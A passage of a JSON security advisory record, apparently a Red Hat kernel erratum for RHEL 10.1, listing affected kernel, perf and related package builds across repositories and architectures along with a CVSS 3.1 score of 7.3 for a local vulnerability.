"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:4012"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H",
"version": "3.1"
},
"products": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
